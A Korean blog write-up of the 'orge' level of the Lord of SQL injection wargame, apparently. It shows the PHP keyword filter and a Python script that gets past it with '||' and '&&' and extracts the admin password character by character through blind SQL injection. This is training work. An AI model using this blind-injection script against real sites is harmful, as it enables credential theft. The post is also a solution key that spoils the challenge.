소스코드 분석
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/or|and/i', $_GET[pw])) exit("HeHe");
기존 Blind 문제에서 or and 를 사용못하게 해놨다.
$query = "select pw from prob_orge where id='admin' and pw='{$_GET[pw]}'";
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orge");
admin의 pw를 찾는 Blind sql injection 문제이다.
import http.client
result=''
leng=0
header={'Cookie':' '}
string="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"
for i in range(1,100) :
length='/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20length(pw)='+str(i)+' %26%26%20id=%27admin'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',length,'',header)
data=conn.getresponse().read()
if "Hello admin" in data.decode():
leng = i
print ("pw length: "+str(i))
break
for i in range(1,leng+1):
for j in range(0,76):
substr='/orge_40d2b61f694f72448be9c97d1cea2480.php?pw=%27%20||%20substr(pw,'+ str(i) +',1)='+'%27'+ str(string[j]) +'%27'+'%26%26%20id=%27admin'
conn=http.client.HTTPConnection('los.eagle-jump.org')
conn.request('GET',substr,'',header)
data=conn.getresponse().read()
if 'Hello admin' in data.decode():
result=result+string[j]
print ('substr(pw,'+str(i)+',1)= '+str(string[j]))
break
print ('Password is '+result)
'WarGame > Web' 카테고리의 다른 글
| [Lord of SQL injection] vampire (0) | 2017.05.25 |
|---|---|
| [Lord of SQL injection] troll (0) | 2017.05.25 |
| [Lord of SQL injection] darkelf (0) | 2017.05.25 |
| [Lord of SQL injection] wolfman (0) | 2017.05.24 |
| [Lord of SQL injection] orc (0) | 2017.05.24 |
